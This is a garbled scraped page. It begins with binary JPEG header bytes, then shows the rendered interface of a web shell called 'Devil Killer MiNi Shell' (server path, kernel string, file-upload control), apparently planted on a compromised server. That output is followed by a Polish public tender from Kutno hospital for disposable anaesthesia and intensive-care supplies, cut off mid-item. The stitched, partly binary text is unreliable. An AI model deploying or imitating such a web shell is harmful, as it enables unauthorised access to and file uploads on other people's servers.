JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250224/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250224/0011697201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> JEDNORAZOWE ARTYKUŁY MEDYCZNE NA POTRZEBY ODDZIAŁU ANESTEZJOLOGII I INTENSYWNEJ TERAPII. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KUTNOWSKI SZPITAL SAMORZĄDOWY SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 100974785</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kutno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">99-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">nzoz.kss@szpital.kutno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.szpital.kutno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> JEDNORAZOWE ARTYKUŁY MEDYCZNE NA POTRZEBY ODDZIAŁU ANESTEZJOLOGII I INTENSYWNEJ TERAPII. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ad47f05c-11c0-47b5-b151-43e88486f38d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00116972</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1067379 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem platformazakupowa.pl (zwanej dalej jako „Platforma”) pod adresem:<br/>https://platformazakupowa.pl/transakcja/1067379</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w<br/>języku polskim, przy użyciu środków komunikacji elektronicznej za pośrednictwem platformazakupowa.pl (zwanej dalej jako<br/>„Platforma”) pod adresem: https://platformazakupowa.pl/transakcja/1067379<br/>2. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>3. Komunikacja w postępowaniu między Zamawiającym a Wykonawcami, w tym składanie ofert, oświadczeń, wniosków,<br/>zawiadomień oraz informacji, odbywa się za pośrednictwem Platformy i formularza „Wyślij wiadomość do Zamawiającego”.<br/>4. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za<br/>pośrednictwem Platformy poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że<br/>wiadomość została wysłana do Zamawiającego.<br/>5. Zamawiający będzie przekazywał Wykonawcom informacje za pośrednictwem Platformy Informacje dotyczące odpowiedzi na<br/>pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji<br/>“Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie<br/>przekazywana za pośrednictwem Platformy do konkretnego Wykonawcy.<br/>6. Wykonawca ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie przesłanych przez<br/>zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>7. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji<br/>elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji<br/>połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem<br/>Platformy, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) Platforma działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>7) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod adresem: https://platformazakupowa.pl/strona/45-<br/>instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), <br/>dalej: RODO, tym samym dane osobowe podane przez Wykonawcę będą przetwarzane zgodnie <br/>z RODO oraz zgodnie z przepisami krajowymi.<br/>2. Zamawiający informuje, że:<br/>1) administratorem danych osobowych Wykonawcy jest „Kutnowski Szpital Samorządowy” <br/>Spółka z o.o., reprezentowany przez Prezesa Zarządu, tel. 24 3880 200, adres e-mail: <br/>nzoz.kss@szpital.kutno.pl<br/>2) w sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się <br/>z Inspektorem Ochrony Danych, za pośrednictwem adresu e-mail: iod@szpital.kutno.pl<br/>3) dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie <br/>zamówienia publicznego pn.: „JEDNORAZOWE ARTYKUŁY MEDYCZNE NA POTRZEBY <br/>ODDZIAŁU ANESTEZJOLOGII I INTENSYWNEJ TERAPII”, Nr postępowania: ZP/6/25 oraz <br/>w celu archiwizacji dokumentacji dotyczącej tego postępowania;<br/>4) odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym <br/>zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy <br/>SWZ<br/>Strona: 16/16<br/>Pzp;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat <br/>od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy <br/>w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania obejmuje cały okres <br/>obowiązywania umowy.<br/>3. Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia <br/>wszystkich obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem <br/>w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>1) obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane <br/>osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał <br/>Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego;<br/>2) obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane <br/>Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu <br/>w treści oferty lub dokumentów składanych na żądanie Zamawiającego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, że;<br/>1) udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków <br/>skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, <br/>o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie;<br/>2) udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych <br/>osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych <br/>ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub <br/>światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych <br/>genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub <br/>danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku <br/>postępowania o udzielenie zamówienia;<br/>3) w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez <br/>Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych z prawem <br/>Wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe <br/>jego dotyczące, prawem Wykonawcy do bycia poinformowanym o odpowiednich zabezpieczeniach, <br/>o których mowa w art. 46 RODO, związanych z przekazaniem jego danych osobowych do państwa <br/>trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez Wykonawcę od <br/>administratora kopii danych osobowych podlegających przetwarzaniu), Zamawiający może żądać <br/>od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu <br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia;<br/>4) skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia, o którym mowa <br/>w art. 16 RODO (uprawnienie do sprostowania lub uzupełnienia danych osobowych), nie może <br/>naruszać integralności protokołu postępowania oraz jego załączników;<br/>5) w postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym <br/>mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu <br/>zakończenia tego postępowania;<br/>6) w przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO <br/>spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania <br/>lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia <br/>Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 <br/>ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/6/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 1 - RURKI INTUBACYJNE, FILTRY, OBWODY ODDECHOWE <br/>L.p / Przedmiot zamówienia / Jedn. / Zapotrzebowanie<br/>1. Rurka intubacyjna bez mankietu – opakowanie folia/papier o profilu ułatwiającym zachowanie pamięci kształtu rurki w rozmiarach od 2,5 /3.0/3.5/4.0/4.5/5.0/5.5	szt.	90<br/>2. Rurka intubacyjna z mankietem niskociśnieniowym z medycznego PVC, z otworem Murphyego z minimum 2 oznaczeniami rozmiaru rurki na korpusie oraz dodatkowe oznaczenie rozmiaru rurki na łączniku 15mm, z balonikiem kontrolnym w kolorze różnym od transparentnego przewodu łączącego z rurką,ze znacznikiem głębokości intubacji w postaci jednego grubego ringu wokół całego obwodu rurki, gładkie atraumatyczne krawędzie, skalowana jednostronnie co 1 cm - opakowanie folia/papier o rozmiarach:od 2,5 do nr 10,0 co pół. 3.0/3	szt.	1800<br/>3. Rurka intubacyjna zbrojona – z mankietem, z czytnikami głębokości nad mankietem na całym obwodzie rurki – opakowanie folia/papier o rozmiarach: 6.0/6.5/7.0/7.5/8.0/8.5/9.0	szt.	750<br/>4. &#34;Rurka intubacyjna specjalna z mankietem w kształcie stożka do przedłużonej intubacji. <br/>Minimum 2 oznaczenia rozmiaru na korpusie rurki, półtransparentny łącznik 15 mm, mankiet niskociśnieniowy, w swej górnej części o średnicy większej niż średnica tchawicy, zwężający się stopniowo ku dołowi (stożek), posiadający dzięki swej konstrukcji strefę całkowitego uszczelnienia tchawicy. Pakowane folia-papier. Rozmiar 6.5 ; 7 ; 7.5; 8.0 ; 8.5 ; 9.0&#34;	szt.	150<br/>5. Rurka tracheostomijna z możliwością odsysania z nad mankietu , mankiet w w kształcie stożka , Rozmiar 6.5 ; 7 ; 7.5; 8.0 ; 8.5 ; 9.0	szt.	30<br/>6. Rurka tracheostomijna z mankietem , Rozmiar 5.0 ; 6.0 ; 7.0 ; 7.5; 8.0 ; 8.5 ; 9.0 ; 10.0	szt.	75<br/>7. Filtr antybakteryjny i antywirusowy mechaniczny do dróg oddechowych z wydzielonym wymiennikiem ciepła i wilgoci oraz zakręcanym portem kapno, sterylny, skuteczność filtracyjna względem bakterii i wirusów ≥ 99.9999 wydajność nawilzania wynosi min. 34mg H2O/l przy VT 500 ml., utrata wilgotności 6 mg H2O/l przy Vt 500 ml –potwierdzone przez producenta lub instrukcję obsługi. Sterylny pakowany pojedynczo folia papier.	szt.	900<br/>8. Filtr antywirusowo-bakteryjny elektrostatyczny z wymiennikiem ciepła i wilgoci skuteczność filtracyjna względem bakterii i wirusów ≥ 99.999 ; przestrzeń martwa 51 ml, waga do 30g,- dla pacjentów powyżej 20 kg, z portem zakręcanym do kapno sterylny pakowany folia papier pojedynczo.	szt.	3750<br/>9. Filtr antywirusowo-bakteryjny elektrostatyczny względem bakterii i wirusów ≥ 99.999 ; przestrzeń martwa 36 ml, waga do 20g, objętość oddechowa 150-1200 ml, z portem zakręcanym do kapno sterylny pakowany folia papier pojedynczo.	szt.	1500<br/>10. Filtr wydechowy , kompatybilny z respiratorem Puritan Bennet 980 , jednorazowego użytku	szt.	75<br/>11. Filtr wdechowy , kompatybilny z respiratorem Puritan Bennet 980 , jednorazowego użytku	szt	75<br/>12. Obwód oddechowy z PCV o gładkim świetle ; 150 cm, trójnik z łącznikiem kątowym z portem do kapnografii	szt	600<br/>13.Obwód oddechowy z PCV o gładkim świetle ;190 cm z workiem; trójnik z łącznikiem kątowym ,  z portem do kapnografii, z zatyczką	szt	750 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33171100-0 - Przyrządy do anestezji</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-07-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet Nr 2 - ZAMKNIĘTY SYSTEM DO ODSYSANIA, ZESTAW DO POBIERANIA PRÓBEK WYDZIELINY I ZESTAW DO NEBULIZACJI DO OBWODU ODDECHOWEGO<br/>L.p / Przedmiot zamówienia / Jedn. / Zapotrzebowanie<br/>1. Sterylny zestaw do pobierania próbek wydzieliny pacjenta o pojemności 15- 25 ml. Możliwość stosowania z zamkniętymi systemami do odsysania oraz ze standardowymi cewnikami w systemie otwartym. W skład wchodzi: pojemnik na próbki śluzu połaczony z dwoma drenami służącymi do podłączenia do systemu ssącego . Dreny zakończone końcówką „lejek” oraz łacznikiem schodkowym, dodatkowo nakrętka i nalepka samoprzylepną.	szt	350<br/>2. Zestaw do nebulizacji do obwodu oddechowego dla dorosłych , jednorazowego użytku. W skład zestawu wchodzi nebulizator do podawania leków w obwodzie oddechowym o pojemności min. 6ml z łącznikiem T, dren tlenowy dł. min 210cm, 2 standardowe łączniki, wykonany z PCV. Cały zestaw jest wolny od ftalanów DEHP, mikrobiologicznie czysty	szt	300<br/>3. Dreny do zamkniętych systemów do odsysania. Sterylny, kompletny zestaw drenów przeznaczony do stosowania z zamkniętymi systemami do odsysania oraz akcesoriami do higieny jamy ustnej. W skład zestawu wchodzi łącznik &#34;Y&#34; do podłączenia pojemnika na wydzielinę, 2 dreny z zaciskami umożliwiające niezależne połączenie z zamkniętym systemem do odsysania oraz standardowym cewnikiem do odsysania z jamy ustnej (końcówka drenu zaopatrzona w łącznik prosty, schodkowy z zatyczką umożliwiającą regulację siły odsysania w systemie otwartym). Możliwość stosowania do 72 godz. Długość drenów min. 2 metry, średnica drenów 25Ch.	szt	750<br/>4. Zamknięty system do odsysania z rurki intubacyjnej CH 14/16, długość 56 cm i 62 cm, rurki tracheostomijnej CH 14/16, długość 36 cm oraz rurki intubacyjnej CH 18 długość 54 cm Właściwości ogólne: możliwość stosowania przez min. 72h (potwierdzona instrukcją obsługi), dla CH 18 min. 48h. Zintegrowany/wbudowany podwójnie obrotowy łącznik o kącie 90 st., zamykany, obrotowy port do przepłukiwania cewnika o długości min. 5 cm, zamykany port do podawania leków wziewnych (MDI) zintegrowany bezpośrednio w części łącznika podłączanej do rurki pacjenta, komora pozwalająca do obserwację wydzieliny pacjenta, zabezpieczenie łącznika podciśnienia w postaci kapturka, zamocowane do zestawu w sposób zapobiegający zagubieniu, aktywacja podciśnienia za pomocą przycisku ściskanego wnętrzem dłoni, blokada przycisku aktywacji podciśnienia poprzez jego obrót o 90 st., uniemożliwiająca przypadkową aktywację odsysania. Przekręcana zastawka na wysokości portu do przepłukiwania oddzielająca cewnik od pacjenta po usunięciu go z rurki (dla rozmiarów CH 14 i CH 16) zapewniająca szczelność zestawu. System stanowiący integralną całość, nierozłączalny, wszystkie elementy systemu sterylne.	szt	450<br/>5. Sterylny adapter do zamkniętych systemów do odsysania z rurek intubacyjnych i tracheostomijnych ,umożliwiający prowadzenie bronchoskopii bez konieczności rozłączenia układu. Adapter posiada: -zintegrowany/wbudowany podwójnie obrotowy łącznik; -kąt nachylenia pomiędzy systemem, a portem służącym do wprowadzenie bronchofiberoskopu nie większy niż 45 stopni; port do wprowadzania bronchofiberoskopu posiadający silikonową zastawkę wewnętrzną oraz silikonowy kapturek zabezpieczający – zapewniający szczelność systemu w trakcie 